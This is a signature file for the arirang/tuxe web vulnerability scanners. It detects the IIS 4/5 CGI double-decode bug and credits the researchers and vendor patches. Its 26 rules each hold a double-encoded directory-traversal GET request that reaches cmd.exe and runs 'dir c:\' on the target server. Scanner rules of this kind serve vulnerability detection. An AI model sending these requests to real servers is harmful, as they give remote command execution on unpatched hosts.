################################################################################################### # # IIS 4/5 CGI Decode bug scan rule for arirang, tuxe # information by # Aldo Albuquerque - CCSA # Tempest Security Technologies - http://www.tempest.com.br # CESAR - Centro de Estudos e Sistemas Avan?dos do Recife - # http://www.cesar.org.br # # rule by pilot # http://www.monkey.org/~pilot # pilot@monkey.org # # # # # IIS 4/5 CGI Decoding bug found by nsfocus http://www.nsfocus.com/english/homepage/sa01-02.htm # vendor patch # IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787 # IIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764 200 OK-> GET :/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug1;; 200 OK-> GET :/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug2;; 200 OK-> GET :/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug3;; 200 OK-> GET :/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug4;; 200 OK-> GET :/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug5;; 200 OK-> GET :/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug6;; 200 OK-> GET :/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug7;; 200 OK-> GET :/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug8;; 200 OK-> GET :/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug9;; 200 OK-> GET :/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug10;; 200 OK-> GET :/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug11;; 200 OK-> GET :/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug12;; 200 OK-> GET :/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug13;; 200 OK-> GET :/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug14;; #- Windows 2000 Server + SP1 + IIS5.0 - Default installation #* The following combinations of directories/encodings work: 200 OK-> GET :/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug15;; 200 OK-> GET :/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug16;; 200 OK-> GET :/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug17;; 200 OK-> GET :/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug18;; 200 OK-> GET :/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug19;; 200 OK-> GET :/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug20;; 200 OK-> GET :/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug21;; 200 OK-> GET :/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug22;; 200 OK-> GET :/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug23;; 200 OK-> GET :/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug24;; 200 OK-> GET :/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug25;; 200 OK-> GET :/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug26;; # check secure IIS 5 http://www.microsoft.com/technet/security/iis5chk.asp